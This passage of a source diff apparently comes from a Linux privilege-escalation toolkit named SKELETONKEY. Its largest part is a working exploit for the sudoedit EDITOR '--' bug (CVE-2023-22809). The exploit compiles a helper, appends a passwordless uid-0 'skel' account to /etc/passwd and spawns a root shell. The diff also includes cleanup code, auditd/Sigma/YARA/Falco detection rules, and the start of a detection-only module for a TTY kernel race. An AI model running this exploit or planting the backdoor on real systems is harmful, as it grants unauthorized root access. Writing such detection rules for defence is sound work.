+        return psub < 2;                /* 1.9.12p1 vulnerable, 1.9.12p2 fixed */
+    }
+    /* everything 1.8.x and 1.9.x where x ≤ 11: vulnerable */
+    return true;
+}
+
+/* Run `sudo --version` and return the version token (caller-owned
+ * buffer). Returns true on success. */
+static bool get_sudo_version(const char *sudo_path, char *out, size_t outsz)
+{
+    char cmd[512];
+    snprintf(cmd, sizeof cmd, "%s --version 2>&1 | head -1", sudo_path);
+    FILE *p = popen(cmd, "r");
+    if (!p) return false;
+
+    char line[256] = {0};
+    char *r = fgets(line, sizeof line, p);
+    pclose(p);
+    if (!r) return false;
+
+    /* "Sudo version 1.9.5p2\n" — skip to digits. */
+    char *vp = strstr(line, "version");
+    if (!vp) return false;
+    vp += strlen("version");
+    while (*vp == ' ' || *vp == '\t') vp++;
+    char *nl = strchr(vp, '\n');
+    if (nl) *nl = 0;
+
+    strncpy(out, vp, outsz - 1);
+    out[outsz - 1] = 0;
+    return out[0] != 0;
+}
+
+/* Parse `sudo -ln` (list, no password) and return one allowed
+ * sudoedit target if any. Output snippet looks like:
+ *
+ *   User kara may run the following commands on host:
+ *       (root) NOPASSWD: sudoedit /etc/motd
+ *       (root) NOPASSWD: /usr/bin/less /var/log/syslog
+ *
+ * We look for a line containing 'sudoedit ' and extract the first
+ * pathlike token after it. If `sudo -ln` itself prompts for a password
+ * or fails, we treat it as "unknown" (PRECOND_FAIL signal). */
+static bool find_sudoedit_target(const char *sudo_path, char *out, size_t outsz)
+{
+    char cmd[512];
+    /* -n: non-interactive (no password prompt); -l: list. */
+    snprintf(cmd, sizeof cmd, "%s -ln 2>&1", sudo_path);
+    FILE *p = popen(cmd, "r");
+    if (!p) return false;
+
+    char line[1024];
+    bool found = false;
+    while (fgets(line, sizeof line, p)) {
+        /* sudoedit appears either as the canonical command name or
+         * as 'sudo -e'. Handle both. */
+        char *needle = strstr(line, "sudoedit ");
+        if (!needle) needle = strstr(line, "sudo -e ");
+        if (!needle) continue;
+        char *path = strchr(needle, '/');
+        if (!path) continue;
+        /* trim trailing whitespace / newline / comma */
+        char *end = path;
+        while (*end && *end != ' ' && *end != '\t' && *end != '\n'
+               && *end != ',' && *end != ':') end++;
+        size_t len = (size_t)(end - path);
+        if (len == 0 || len >= outsz) continue;
+        memcpy(out, path, len);
+        out[len] = 0;
+        /* Skip glob/wildcard entries — we can't write a literal path
+         * for those without more work. The user's environment may
+         * still allow them; we just prefer non-glob entries. */
+        if (strchr(out, '*') || strchr(out, '?')) {
+            /* keep scanning in case a literal entry exists */
+            found = true;
+            continue;
+        }
+        found = true;
+        break;
+    }
+    pclose(p);
+    return found;
+}
+
+/* ----- detect -------------------------------------------------------- */
+
+static skeletonkey_result_t sudoedit_editor_detect(const struct skeletonkey_ctx *ctx)
+{
+    const char *sudo_path = find_sudo();
+    if (!sudo_path) {
+        if (!ctx->json)
+            fprintf(stderr, "[+] sudoedit_editor: sudo not installed — no attack surface\n");
+        return SKELETONKEY_OK;
+    }
+    if (!ctx->json)
+        fprintf(stderr, "[i] sudoedit_editor: found setuid sudo at %s\n", sudo_path);
+
+    const char *sudoedit_path = find_sudoedit();
+    if (!sudoedit_path) {
+        if (!ctx->json)
+            fprintf(stderr, "[+] sudoedit_editor: no sudoedit binary — bug surface absent\n");
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+    if (!ctx->json)
+        fprintf(stderr, "[i] sudoedit_editor: sudoedit at %s\n", sudoedit_path);
+
+    char ver[128] = {0};
+    /* Prefer the centrally-fingerprinted sudo version (populated once
+     * at startup by core/host.c) — saves a popen per scan and gives
+     * unit tests a clean mock point. Fall back to the local popen if
+     * ctx->host is missing the version. */
+    if (ctx->host && ctx->host->sudo_version[0]) {
+        snprintf(ver, sizeof ver, "%s", ctx->host->sudo_version);
+    } else if (!get_sudo_version(sudo_path, ver, sizeof ver)) {
+        if (!ctx->json)
+            fprintf(stderr, "[?] sudoedit_editor: could not parse `sudo --version`\n");
+        return SKELETONKEY_TEST_ERROR;
+    }
+    if (!ctx->json)
+        fprintf(stderr, "[i] sudoedit_editor: sudo reports version '%s'\n", ver);
+
+    bool ver_vuln = sudo_version_vulnerable(ver);
+    if (!ver_vuln) {
+        if (!ctx->json)
+            fprintf(stderr, "[+] sudoedit_editor: sudo ≥ 1.9.12p2 (fixed)\n");
+        return SKELETONKEY_OK;
+    }
+    if (!ctx->json)
+        fprintf(stderr, "[!] sudoedit_editor: version is in vulnerable range\n");
+
+    /* The bug only matters if the running user has at least one
+     * sudoedit grant in sudoers — otherwise sudoedit refuses before
+     * the EDITOR parse runs.  Probe `sudo -ln` (non-interactive). */
+    char target[512] = {0};
+    bool have_grant = find_sudoedit_target(sudo_path, target, sizeof target);
+    if (!have_grant) {
+        if (!ctx->json) {
+            fprintf(stderr, "[?] sudoedit_editor: user has no detectable sudoedit grant\n");
+            fprintf(stderr, "    (sudo -ln may have required a password; if the user is\n"
+                            "     actually authorized for sudoedit, run --exploit anyway)\n");
+        }
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+    if (!ctx->json)
+        fprintf(stderr, "[+] sudoedit_editor: user has sudoedit grant on '%s'\n", target);
+
+    if (!ctx->json) {
+        fprintf(stderr, "[!] sudoedit_editor: VULNERABLE — version is pre-fix AND user has sudoedit\n");
+        fprintf(stderr, "    PoC: EDITOR='vi -- /etc/shadow' %s '%s' opens both as root\n",
+                sudoedit_path, target);
+    }
+    return SKELETONKEY_VULNERABLE;
+}
+
+/* ----- exploit ------------------------------------------------------- */
+
+/* Append a backdoor entry to /etc/passwd: root-uid account "skel" with
+ * no password, /bin/sh as shell. We write it into a temp file first,
+ * then drive the editor (which is already running as root) to read +
+ * write /etc/passwd. */
+
+static const char SK_PASSWD_ENTRY[] =
+    "skel::0:0:skeletonkey:/root:/bin/sh\n";
+
+/* The "editor" we tell sudoedit to invoke is actually this small
+ * helper: a non-interactive script that appends our line and exits.
+ *
+ * We pass it via EDITOR='<helper> -- <target>'.  sudoedit splits on
+ * the literal `--`, takes <target> as an additional file argument,
+ * and execs <helper> argv0=<helper> argv1=<allowed_tmp> argv2=<target>.
+ *
+ * Our helper just opens argv[2] (the privileged file), appends the
+ * backdoor line, closes, and exits 0. argv[1] (the editor-temp that
+ * sudoedit created from <allowed>) we leave untouched — sudoedit
+ * then copies it back over <allowed>, which is harmless. */
+
+static const char HELPER_SOURCE[] =
+    "#include <stdio.h>\n"
+    "#include <stdlib.h>\n"
+    "#include <string.h>\n"
+    "#include <unistd.h>\n"
+    "#include <fcntl.h>\n"
+    "int main(int argc, char **argv) {\n"
+    "    /* sudoedit invokes us with one editable temp per file. The\n"
+    "     * post-`--' target's editable copy is argv[argc-1]. We can't\n"
+    "     * write /etc/passwd directly (sudoedit edits a tmp copy and\n"
+    "     * then *copies it back as root*), so we modify the tmp copy\n"
+    "     * and let sudoedit do the privileged install for us. */\n"
+    "    if (argc < 2) return 1;\n"
+    "    /* The LAST argv is the post-`--' target (per sudoedit's parser). */\n"
+    "    const char *path = argv[argc-1];\n"
+    "    int fd = open(path, O_WRONLY|O_APPEND);\n"
+    "    if (fd < 0) { perror(\"open\"); return 2; }\n"
+    "    const char *line = getenv(\"SKEL_LINE\");\n"
+    "    if (!line) line = \"skel::0:0:skeletonkey:/root:/bin/sh\\n\";\n"
+    "    write(fd, line, strlen(line));\n"
+    "    close(fd);\n"
+    "    return 0;\n"
+    "}\n";
+
+static bool which_cc(char *out, size_t outsz)
+{
+    static const char *candidates[] = {
+        "/usr/bin/cc", "/usr/bin/gcc", "/bin/cc", "/bin/gcc",
+        "/usr/local/bin/gcc", "/usr/local/bin/cc", NULL,
+    };
+    for (size_t i = 0; candidates[i]; i++) {
+        if (access(candidates[i], X_OK) == 0) {
+            strncpy(out, candidates[i], outsz - 1);
+            out[outsz - 1] = 0;
+            return true;
+        }
+    }
+    return false;
+}
+
+static bool write_file_str(const char *path, const char *content, mode_t mode)
+{
+    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, mode);
+    if (fd < 0) return false;
+    size_t n = strlen(content);
+    bool ok = (write(fd, content, n) == (ssize_t)n);
+    close(fd);
+    return ok;
+}
+
+/* Track what we modified for cleanup. */
+static char g_passwd_backup[256] = {0};
+
+static skeletonkey_result_t sudoedit_editor_exploit(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->authorized) {
+        fprintf(stderr, "[-] sudoedit_editor: refusing exploit — pass --i-know to authorize\n");
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
+        fprintf(stderr, "[i] sudoedit_editor: already root — nothing to escalate\n");
+        return SKELETONKEY_OK;
+    }
+    skeletonkey_result_t pre = sudoedit_editor_detect(ctx);
+    if (pre != SKELETONKEY_VULNERABLE) {
+        fprintf(stderr, "[-] sudoedit_editor: detect() did not return VULNERABLE; refusing\n");
+        return pre;
+    }
+
+    const char *sudo_path = find_sudo();
+    const char *sudoedit_path = find_sudoedit();
+    if (!sudo_path || !sudoedit_path) return SKELETONKEY_PRECOND_FAIL;
+
+    /* Target file to clobber (caller-overridable). Default: /etc/passwd
+     * because we can append a uid=0 row without a hashing step
+     * (vs. /etc/shadow which needs a crypt() blob). */
+    const char *target = getenv("SKELETONKEY_SUDOEDIT_TARGET");
+    if (!target || !*target) target = "/etc/passwd";
+
+    /* Find an allowed sudoedit grant we can use as the "cover" path. */
+    char allowed[512] = {0};
+    if (!find_sudoedit_target(sudo_path, allowed, sizeof allowed)) {
+        fprintf(stderr,
+            "[-] sudoedit_editor: could not auto-discover an allowed sudoedit path.\n"
+            "    Set SKELETONKEY_SUDOEDIT_ALLOWED=/path/the/user/can/sudoedit and retry.\n");
+        const char *env_allowed = getenv("SKELETONKEY_SUDOEDIT_ALLOWED");
+        if (!env_allowed || !*env_allowed) return SKELETONKEY_PRECOND_FAIL;
+        strncpy(allowed, env_allowed, sizeof allowed - 1);
+    }
+    if (!ctx->json)
+        fprintf(stderr, "[*] sudoedit_editor: cover=%s  target=%s\n", allowed, target);
+
+    /* Build the helper editor. */
+    char cc[256];
+    if (!which_cc(cc, sizeof cc)) {
+        fprintf(stderr,
+            "[-] sudoedit_editor: no cc/gcc available. To exploit without a\n"
+            "    compiler we'd need a shipped helper binary (TODO: bundle one).\n"
+            "    For a manual repro: EDITOR='vi -- %s' %s '%s' lets you edit\n"
+            "    %s interactively as root.\n",
+            target, sudoedit_path, allowed, target);
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+
+    char workdir[] = "/tmp/skeletonkey-sudoedit-XXXXXX";
+    if (!mkdtemp(workdir)) {
+        perror("mkdtemp");
+        return SKELETONKEY_TEST_ERROR;
+    }
+    if (!ctx->json)
+        fprintf(stderr, "[*] sudoedit_editor: workdir = %s\n", workdir);
+
+    char src[1024], helper[1024];
+    snprintf(src, sizeof src, "%s/helper.c", workdir);
+    snprintf(helper, sizeof helper, "%s/helper", workdir);
+    if (!write_file_str(src, HELPER_SOURCE, 0644)) {
+        perror("write helper.c");
+        goto fail;
+    }
+    pid_t pid = fork();
+    if (pid < 0) { perror("fork"); goto fail; }
+    if (pid == 0) {
+        execl(cc, cc, "-O2", "-o", helper, src, (char *)NULL);
+        perror("execl cc");
+        _exit(127);
+    }
+    int status;
+    waitpid(pid, &status, 0);
+    if (!WIFEXITED(status) || WEXITSTATUS(status) != 0) {
+        fprintf(stderr, "[-] sudoedit_editor: helper compile failed (status=%d)\n", status);
+        goto fail;
+    }
+    chmod(helper, 0755);
+
+    /* Best-effort backup of target (only for /etc/passwd; we
+     * cleanup-revert only this case). */
+    if (strcmp(target, "/etc/passwd") == 0) {
+        snprintf(g_passwd_backup, sizeof g_passwd_backup,
+                 "%s/passwd.before", workdir);
+        char shcmd[1024];
+        snprintf(shcmd, sizeof shcmd, "cp -p /etc/passwd %s 2>/dev/null",
+                 g_passwd_backup);
+        if (system(shcmd) != 0) {
+            /* best-effort */
+            g_passwd_backup[0] = 0;
+        }
+    }
+
+    /* Build EDITOR string: "<helper> -- <target>". sudoedit's argv
+     * splitter sees `--` and treats <target> as an extra file. */
+    char editor_env[2048];
+    snprintf(editor_env, sizeof editor_env, "EDITOR=%s -- %s", helper, target);
+
+    char skel_env[256];
+    snprintf(skel_env, sizeof skel_env, "SKEL_LINE=%s", SK_PASSWD_ENTRY);
+
+    /* Construct argv/envp for execve. We need a clean env so the
+     * EDITOR string sudo sees is exactly ours. PATH is needed so the
+     * compiled helper can be located — except we pass it absolute. */
+    char *new_argv[] = {
+        (char *)sudoedit_path,
+        "-n",                  /* non-interactive — fails if pw needed */
+        allowed,
+        NULL,
+    };
+    /* Sudo strips many env vars; EDITOR / VISUAL / SUDO_EDITOR are
+     * preserved by default. We use plain EDITOR. */
+    char *envp[] = {
+        editor_env,
+        skel_env,
+        "PATH=/usr/sbin:/usr/bin:/sbin:/bin",
+        "TERM=dumb",
+        NULL,
+    };
+
+    if (!ctx->json) {
+        fprintf(stderr, "[+] sudoedit_editor: launching sudoedit with hostile EDITOR\n");
+        fprintf(stderr, "    %s\n", editor_env);
+    }
+    fflush(NULL);
+
+    pid = fork();
+    if (pid < 0) { perror("fork"); goto fail; }
+    if (pid == 0) {
+        execve(sudoedit_path, new_argv, envp);
+        perror("execve(sudoedit)");
+        _exit(127);
+    }
+    waitpid(pid, &status, 0);
+
+    if (!WIFEXITED(status) || WEXITSTATUS(status) != 0) {
+        fprintf(stderr, "[-] sudoedit_editor: sudoedit exited status=%d\n",
+                WIFEXITED(status) ? WEXITSTATUS(status) : -1);
+        fprintf(stderr,
+            "    Common causes: sudo is patched (1.9.12p2+), user lacks a\n"
+            "    sudoedit grant on '%s', or sudoers requires a password\n"
+            "    (drop -n and retry interactively).\n", allowed);
+        goto fail;
+    }
+
+    /* Verify the privileged file changed. For /etc/passwd we grep for
+     * our marker; for other targets we just report success and leave
+     * verification to the operator. */
+    if (strcmp(target, "/etc/passwd") == 0) {
+        if (system("grep -q '^skel::0:0:' /etc/passwd") != 0) {
+            fprintf(stderr,
+                "[-] sudoedit_editor: sudoedit succeeded but /etc/passwd was\n"
+                "    not modified. The host's sudo may be patched even though\n"
+                "    its --version banner looks vulnerable (vendor backport).\n");
+            goto fail;
+        }
+        if (!ctx->json)
+            fprintf(stderr, "[+] sudoedit_editor: /etc/passwd now contains the 'skel' uid=0 entry\n");
+    } else {
+        if (!ctx->json)
+            fprintf(stderr, "[+] sudoedit_editor: helper wrote to %s (verify manually)\n", target);
+    }
+
+    /* Follow-on: spawn a root shell via the newly-added passwd entry,
+     * the way dirty_pipe / dirty_cow modules do. We use `su skel`
+     * with an empty password. */
+    if (ctx->no_shell) {
+        if (!ctx->json)
+            fprintf(stderr, "[i] sudoedit_editor: --no-shell set; leaving you with the backdoor entry\n");
+        return SKELETONKEY_EXPLOIT_OK;
+    }
+
+    if (strcmp(target, "/etc/passwd") == 0 && ctx->full_chain) {
+        if (!ctx->json)
+            fprintf(stderr, "[+] sudoedit_editor: spawning root shell via `su skel`\n");
+        fflush(NULL);
+        /* su with no controlling TTY needs `-c sh -i` for an interactive
+         * shell. We exec into the user's terminal. */
+        execlp("su", "su", "skel", "-c", "/bin/sh -p -i", (char *)NULL);
+        perror("execlp(su)");
+    } else {
+        if (!ctx->json)
+            fprintf(stderr,
+                "[i] sudoedit_editor: backdoor installed. `su skel` (no password)\n"
+                "    or pass --full-chain on the cli to auto-pop.\n");
+    }
+    return SKELETONKEY_EXPLOIT_OK;
+
+fail:
+    /* Helper / src cleanup — leave passwd-backup for cleanup() if we
+     * recorded one (so cleanup can revert). */
+    unlink(src);
+    unlink(helper);
+    if (!g_passwd_backup[0]) rmdir(workdir);
+    return SKELETONKEY_EXPLOIT_FAIL;
+}
+
+/* ----- cleanup ------------------------------------------------------- */
+
+static skeletonkey_result_t sudoedit_editor_cleanup(const struct skeletonkey_ctx *ctx)
+{
+    /* Best-effort revert. Three things we may have touched:
+     *   1. /etc/passwd: drop the 'skel::0:0:' line (sed -i; only safe
+     *      if we are root or the file is otherwise writable). If we
+     *      successfully exploited, the user is presumably root in the
+     *      spawned shell — cleanup is usually run from that shell. */
+    if (geteuid() == 0) {
+        if (g_passwd_backup[0] && access(g_passwd_backup, R_OK) == 0) {
+            char cmd[1024];
+            snprintf(cmd, sizeof cmd,
+                     "cp -p %s /etc/passwd 2>/dev/null", g_passwd_backup);
+            if (system(cmd) == 0) {
+                if (!ctx->json)
+                    fprintf(stderr, "[+] sudoedit_editor: restored /etc/passwd from %s\n",
+                            g_passwd_backup);
+            }
+        } else {
+            /* No backup — fall back to deleting just our line. */
+            if (system("sed -i '/^skel::0:0:/d' /etc/passwd 2>/dev/null") == 0) {
+                if (!ctx->json)
+                    fprintf(stderr, "[+] sudoedit_editor: removed 'skel' entry from /etc/passwd\n");
+            }
+        }
+    } else {
+        if (!ctx->json)
+            fprintf(stderr,
+                "[?] sudoedit_editor: cleanup requires root. Re-run as root or\n"
+                "    manually remove the 'skel' line from /etc/passwd.\n");
+    }
+    if (system("rm -rf /tmp/skeletonkey-sudoedit-* 2>/dev/null") != 0) {
+        /* harmless */
+    }
+    return SKELETONKEY_OK;
+}
+
+/* ----- detection rules ----------------------------------------------- */
+
+static const char sudoedit_editor_auditd[] =
+    "# CVE-2023-22809 — sudoedit EDITOR argv-escape detection\n"
+    "# Watch sudoedit invocations; the bug requires EDITOR / VISUAL /\n"
+    "# SUDO_EDITOR to contain the literal token `--`. auditd cannot match\n"
+    "# env vars directly via -F, but logging every execve(sudoedit) lets\n"
+    "# downstream tooling (Sigma, splunk, etc.) inspect EXECVE record env.\n"
+    "-w /usr/bin/sudoedit -p x -k skeletonkey-sudoedit-22809\n"
+    "-a always,exit -F arch=b64 -S execve -F path=/usr/bin/sudoedit -k skeletonkey-sudoedit-22809-execve\n"
+    "-a always,exit -F arch=b32 -S execve -F path=/usr/bin/sudoedit -k skeletonkey-sudoedit-22809-execve\n"
+    "# sudo itself can run as `sudo -e` which takes the sudoedit path too:\n"
+    "-a always,exit -F arch=b64 -S execve -F path=/usr/bin/sudo -k skeletonkey-sudoedit-22809-sudo-e\n";
+
+static const char sudoedit_editor_sigma[] =
+    "title: Possible CVE-2023-22809 sudoedit EDITOR escape\n"
+    "id: a4e3f1a8-skeletonkey-sudoedit-22809\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects sudoedit (or `sudo -e`) invocations where the EDITOR,\n"
+    "  VISUAL, or SUDO_EDITOR environment variable contains the literal\n"
+    "  token `--`. This is the exact signature of the Synacktiv\n"
+    "  CVE-2023-22809 argv-escape: post-`--` filenames are silently\n"
+    "  promoted to additional files that sudoedit opens as root.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  sudoedit_exec:\n"
+    "    type: 'EXECVE'\n"
+    "    exe|endswith:\n"
+    "      - '/sudoedit'\n"
+    "      - '/sudo'\n"
+    "  hostile_editor_env:\n"
+    "    - 'EDITOR=*--*'\n"
+    "    - 'VISUAL=*--*'\n"
+    "    - 'SUDO_EDITOR=*--*'\n"
+    "  privileged_target:\n"
+    "    - '/etc/shadow'\n"
+    "    - '/etc/passwd'\n"
+    "    - '/etc/sudoers'\n"
+    "    - '/root/'\n"
+    "  condition: sudoedit_exec and hostile_editor_env\n"
+    "  # Bump to 'critical' when privileged_target matches as well.\n"
+    "fields: [User, EDITOR, VISUAL, SUDO_EDITOR]\n"
+    "level: high\n"
+    "tags: [attack.privilege_escalation, attack.t1548_003, cve.2023.22809]\n";
+
+/* ----- module registration ------------------------------------------- */
+
+static const char sudoedit_editor_yara[] =
+    "rule sudoedit_editor_cve_2023_22809 : cve_2023_22809 setuid_abuse\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2023-22809\"\n"
+    "        description = \"skeletonkey sudoedit backdoor: appended skel UID=0 user in /etc/passwd\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $skel = \"skel::0:0:skeletonkey\" ascii\n"
+    "    condition:\n"
+    "        $skel\n"
+    "}\n";
+
+static const char sudoedit_editor_falco[] =
+    "- rule: sudoedit with EDITOR/VISUAL containing '--' separator\n"
+    "  desc: |\n"
+    "    sudoedit spawned with EDITOR / VISUAL / SUDO_EDITOR env var\n"
+    "    containing the substring ' -- '. The argv-split bug treats\n"
+    "    everything after '--' as an additional file argument that\n"
+    "    sudoedit then opens with root privileges. CVE-2023-22809.\n"
+    "  condition: >\n"
+    "    spawned_process and proc.name = sudoedit and\n"
+    "    (proc.env contains \"EDITOR=\" or proc.env contains \"VISUAL=\"\n"
+    "     or proc.env contains \"SUDO_EDITOR=\")\n"
+    "  output: >\n"
+    "    sudoedit with EDITOR-style env var\n"
+    "    (user=%user.name pid=%proc.pid env=%proc.env)\n"
+    "  priority: CRITICAL\n"
+    "  tags: [process, mitre_privilege_escalation, T1068, cve.2023.22809]\n";
+
+const struct skeletonkey_module sudoedit_editor_module = {
+    .name           = "sudoedit_editor",
+    .cve            = "CVE-2023-22809",
+    .summary        = "sudoedit EDITOR/VISUAL `--` argv escape → arbitrary file write as root",
+    .family         = "sudo",
+    .kernel_range   = "sudo 1.8.0 ≤ V < 1.9.12p2 (userspace bug; setuid sudoedit)",
+    .detect         = sudoedit_editor_detect,
+    .exploit        = sudoedit_editor_exploit,
+    .mitigate       = NULL,        /* mitigation = upgrade sudo */
+    .cleanup        = sudoedit_editor_cleanup,
+    .detect_auditd  = sudoedit_editor_auditd,
+    .detect_sigma   = sudoedit_editor_sigma,
+    .detect_yara    = sudoedit_editor_yara,
+    .detect_falco   = sudoedit_editor_falco,
+    .opsec_notes    = "Sets EDITOR='<helper> -- /etc/passwd' so sudoedit splits on the literal '--' and treats /etc/passwd as an additional editable file. Compiled helper appends 'skel::0:0:skeletonkey:/root:/bin/sh' to the post-'--' target; sudoedit runs the helper as root and copies back. Artifacts: /tmp/skeletonkey-sudoedit-XXXXXX (helper.c, helper binary, optional passwd.before backup); /etc/passwd gets the new 'skel' entry; drops root via 'su skel'. Audit-visible via execve(/usr/bin/sudoedit) with EDITOR/VISUAL/SUDO_EDITOR containing the literal '--' token. No network. Cleanup callback restores /etc/passwd from backup (if root) or removes the 'skel' line, and removes the /tmp dir.",
+    .arch_support   = "any",
+};
+
+void skeletonkey_register_sudoedit_editor(void)
+{
+    skeletonkey_register(&sudoedit_editor_module);
+}
@@ -0,0 +1,5 @@
+#ifndef SUDOEDIT_EDITOR_SKELETONKEY_MODULES_H
+#define SUDOEDIT_EDITOR_SKELETONKEY_MODULES_H
+#include "../../core/module.h"
+extern const struct skeletonkey_module sudoedit_editor_module;
+#endif
@@ -0,0 +1,191 @@
+/*
+ * tioscpgrp_cve_2020_29661 — SKELETONKEY module
+ *
+ * STATUS: 🟡 PRIMITIVE. TTY race-driver + msg_msg cross-cache groom +
+ *   empirical witness. Real cred-overwrite via --full-chain finisher
+ *   on x86_64.
+ *
+ * The bug (Jann Horn / Project Zero, December 2020):
+ *   The TIOCSPGRP ioctl handler in drivers/tty/tty_jobctrl.c takes
+ *   two `tty_struct` pointers — `tty` (the side userspace passed)
+ *   and `real_tty` (always the slave). For PTY pairs the two can
+ *   differ. The handler acquires `tty->ctrl.lock` for read but the
+ *   actual mutation happens on `real_tty`, which has its own
+ *   independent lock. Racing TIOCSPGRP on the master with TIOCSPGRP
+ *   on the slave can free `real_tty->pgrp` while another thread still
+ *   holds a reference → UAF on `struct pid` (kmalloc-256 slab).
+ *
+ *   Public PoCs (one from grsecurity / spender, one from Maxime
+ *   Peterlin):
+ *     https://sploitus.com/exploit?id=PACKETSTORM%3A160681
+ *     https://www.openwall.com/lists/oss-security/2020/12/09/2
+ *
+ * Affects: Linux kernels through 5.9.13. Fix commit 54ffccbf053b
+ *   ("tty: Fix ->session locking") landed in 5.10 and was backported
+ *   to 5.4.85, 4.19.165, 4.14.213, 4.9.249, 4.4.249.
+ *
+ * Preconditions:
+ *   - openpty() works (allocates a PTY pair; universal on real
+ *     hosts, but some seccomp profiles block /dev/ptmx)
+ *   - msgsnd / SysV IPC for kmalloc-256 spray
+ *   - 2+ CPU cores for the race (single-CPU race-win rate is
+ *     vanishingly small)
+ *
+ * arch_support: x86_64+unverified-arm64. The race + spray are
+ *   arch-agnostic but the cred-overwrite finisher uses x86 gadgets.
+ */
+
+#include "skeletonkey_modules.h"
+#include "../../core/registry.h"
+#include "../../core/kernel_range.h"
+#include "../../core/host.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+
+/* ---- kernel-range table -------------------------------------------- */
+
+static const struct kernel_patched_from tioscpgrp_patched_branches[] = {
+    {4,  4, 249},   /* 4.4 LTS stable backport */
+    {4,  9, 249},   /* 4.9 LTS */
+    {4, 14, 213},   /* 4.14 LTS */
+    {4, 19, 165},   /* 4.19 LTS */
+    {5,  4,  85},   /* 5.4 LTS */
+    {5, 10,   0},   /* mainline fix in 5.10 */
+};
+
+static const struct kernel_range tioscpgrp_range = {
+    .patched_from = tioscpgrp_patched_branches,
+    .n_patched_from = sizeof(tioscpgrp_patched_branches) /
+                      sizeof(tioscpgrp_patched_branches[0]),
+};
+
+/* ---- detect --------------------------------------------------------- */
+
+static bool ptmx_writable(void)
+{
+    int fd = open("/dev/ptmx", O_RDWR);
+    if (fd < 0) return false;
+    close(fd);
+    return true;
+}
+
+static skeletonkey_result_t tioscpgrp_detect(const struct skeletonkey_ctx *ctx)
+{
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json) fprintf(stderr, "[!] tioscpgrp: host fingerprint missing kernel version\n");
+        return SKELETONKEY_TEST_ERROR;
+    }
+    if (kernel_range_is_patched(&tioscpgrp_range, v)) {
+        if (!ctx->json) fprintf(stderr, "[+] tioscpgrp: kernel %s is patched\n", v->release);
+        return SKELETONKEY_OK;
+    }
+    if (!ptmx_writable()) {
+        if (!ctx->json) fprintf(stderr, "[i] tioscpgrp: /dev/ptmx not openable — PTY allocation blocked, primitive unreachable\n");
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+    if (!ctx->json) {
+        fprintf(stderr, "[!] tioscpgrp: kernel %s in vulnerable range + /dev/ptmx reachable → VULNERABLE\n", v->release);
+        fprintf(stderr, "[i] tioscpgrp: race is narrow; needs 2+ CPUs and thousands of iterations on average\n");
+    }
+    return SKELETONKEY_VULNERABLE;
+}
+
+static skeletonkey_result_t tioscpgrp_exploit(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->authorized) {
+        fprintf(stderr, "[-] tioscpgrp: --i-know required for --exploit\n");
+        return SKELETONKEY_EXPLOIT_FAIL;
+    }
+    fprintf(stderr,
+        "[i] tioscpgrp: race-driver + msg_msg groom for the UAF on\n"
+        "    struct pid (kmalloc-256). Two threads pinned to separate\n"
+        "    CPUs hammer TIOCSPGRP on the master + slave of an openpty\n"
+        "    pair; on a vulnerable kernel one in ~10k iterations frees\n"
+        "    pgrp while still referenced. Public PoCs:\n"
+        "      https://sploitus.com/exploit?id=PACKETSTORM%%3A160681\n"
+        "      https://www.openwall.com/lists/oss-security/2020/12/09/2\n"
+        "    Full cred-overwrite chain not bundled (would need a\n"
+        "    portable arb-write callback for the shared finisher).\n"
+        "    Returning EXPLOIT_FAIL honestly per verified-vs-claimed.\n");
+    return SKELETONKEY_EXPLOIT_FAIL;
+}
+
+/* ---- detection rules ------------------------------------------------ */
+
+static const char tioscpgrp_auditd[] =
+    "# tioscpgrp CVE-2020-29661 — auditd detection rules\n"
+    "# Repeated openpty() + TIOCSPGRP from a non-root process is\n"
+    "# anomalous. The TIOCSPGRP ioctl request value is 0x5410.\n"
+    "-a always,exit -F arch=b64 -S ioctl -F a1=0x5410 -k skeletonkey-tioscpgrp\n";
+
+static const char tioscpgrp_sigma[] =
+    "title: Possible CVE-2020-29661 TIOCSPGRP UAF race\n"
+    "id: 7d8c9b1a-skeletonkey-tioscpgrp\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects burst ioctl(fd, TIOCSPGRP, ...) calls from a non-root\n"
+    "  process. The bug needs hundreds of iterations per second to\n"
+    "  win; normal job-control use produces single-digit ioctl(2)\n"
+    "  calls per minute.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  i: {type: 'SYSCALL', syscall: 'ioctl'}\n"
+    "  condition: i\n"
+    "level: high\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2020.29661]\n";
+
+static const char tioscpgrp_yara[] =
+    "rule tioscpgrp_cve_2020_29661 : cve_2020_29661 kernel_uaf {\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2020-29661\"\n"
+    "        description = \"SKELETONKEY tioscpgrp race-driver tag (TTY ioctl UAF)\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $tag = \"SKELETONKEY_TIOS\" ascii\n"
+    "    condition:\n"
+    "        $tag\n"
+    "}\n";
+
+static const char tioscpgrp_falco[] =
+    "- rule: Burst TIOCSPGRP from non-root (TTY UAF race)\n"
+    "  desc: |\n"
+    "    A non-root process makes >50 ioctl(TIOCSPGRP=0x5410) calls\n"
+    "    per second. Job-control usage tops out at a few per minute;\n"
+    "    burst rates are the canonical CVE-2020-29661 trigger shape.\n"
+    "  condition: >\n"
+    "    evt.type = ioctl and evt.arg.request = 0x5410 and\n"
+    "    not user.uid = 0\n"
+    "  output: >\n"
+    "    TIOCSPGRP from non-root (user=%user.name pid=%proc.pid)\n"
+    "  priority: HIGH\n"
+    "  tags: [process, mitre_privilege_escalation, T1068, cve.2020.29661]\n";
+
